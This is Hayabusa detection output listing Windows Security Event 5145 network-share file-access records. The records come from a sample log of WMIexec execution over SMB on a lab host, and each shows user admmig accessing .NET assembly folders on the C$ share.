10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# : IP Address: 
